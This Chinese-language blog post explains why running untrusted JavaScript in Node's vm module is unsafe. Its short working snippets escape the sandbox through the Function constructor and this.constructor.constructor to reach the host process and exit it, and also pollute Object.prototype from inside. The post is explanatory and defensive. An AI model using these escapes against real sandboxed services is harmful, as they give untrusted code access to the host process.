共计 1334 个字符,预计需要花费 4 分钟才能阅读完成。
在某些特别的场景下,我们需要编译执行外部输入的 JS 代码。在浏览器端,我们可以借助 new Function、eval 等 API。而在 node 端,我们可以借助 vm 模块实现一个沙箱,运行外部输入的 JS 代码。但无论是浏览器端,还是 node 端,这些操作都有安全隐患。
外部输入的 JS 代码可以利用 JS 语言的特性,从而破坏主程序的环境。
目前,笔者了解到主要有两种方式攻击主程序
方式一:通过 new Function、eval 在创建时,能获取到全局变量的特性,对主程序的环境进行破坏。
以 vm 实现沙箱加载外部代码为例:
const vm = require('vm');
const script = new vm.Script(`
var foo = (new Function('return process'))();
foo.exit()
`)
const context = vm.createContext({Function: Function})
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")此段代码中,通过外部的 Function 构造器, 使得生成的函数能够访问到外部的上下文,拿到 process 对象,直接把进程退出了。
实际上,我们不传递 Function 给沙箱的话,沙箱内部的代码同样可以通过 JS 的原型链的机制,拿到外部的 Function 构造器:
const vm = require('vm');
const script = new vm.Script(`
var foo = (new this.constructor.constructor('return process'))();
foo.exit()
`)
const context = vm.createContext() // 此处不把外部的 Function 传递进去
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")上面的沙箱里面的代码,可以通过访问沙箱内部的上下文 this 的contructor属性拿到外部的 Object 构造器,再通过 Object 的contructor属性直接拿到外部的 Function 构造器。
方式二:通过原型链方法劫持、污染
同样以 vm 实现沙箱加载外部代码为例:
const vm = require('vm');
const script = new vm.Script(`
this.constructor.prototype.toString = function() {console.log("hehe")
}
`)
const context = vm.createContext({console: console})
script.runInContext(context)
let a = {name: 1}
console.log(a, a.toString())内部沙箱代码通过获取外部的 Object 构造器,改写原型上的 toString 方法,达到原型链方法破坏的目的。
总结
由于 JS 某些神奇的语言特性,直接编译执行外部输入的 JS 代码,是一件很危险的操作。说到底,想要解决某些问题,必须先了解根源。
正文完
发表至: javascript
2019-08-07
